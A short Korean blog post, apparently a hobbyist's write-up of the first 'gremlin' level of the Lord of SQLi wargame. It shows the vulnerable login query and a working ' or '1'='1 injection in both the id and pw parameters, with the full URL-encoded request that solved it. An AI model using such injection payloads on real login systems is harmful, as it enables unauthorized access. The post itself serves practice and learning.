활용할 사이트 https://los.rubiya.kr/
kkh123 / 1234로 회원가입 후 던전입장
gremlin 클릭
첫문제부터 익숙한 쿼리가 나왔다.
- query : select id from prob_gremlin where id ='' and pw=''
문제는 GET[id] 와 GET[pw] 쿼리가 실행되는 php코드를 활용해 url에 직접 id, pw값을 넣으면 해결될 것 같아 루키즈 모의해킹시간에 배운 '1' or '1'='1'문을 url id와 pw에 넣으니 바로 풀렸던 문제였다.
-
문제 해결을 위해 사용한 query : select id from prob_gremlin where id='1' or '1'='1' and pw='1' or '1'='1'
-
입력 url : los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php?id=1%27%20or%20%271%27=%271&pw=1%27%20or%20%271%27=%271
url에 id, pw를 aaa로 입력한 결과
or '1'='1' 구문을 추가한 결과
aaa를 1로 바꿔 시도한 결과
소감
- 간단한 php문이라 조건문이 낯설지 않아 풀수있었던 문제라 생각하고, 기회가 되면 php에 대해 공부해야겠다고 생각했음
취미해킹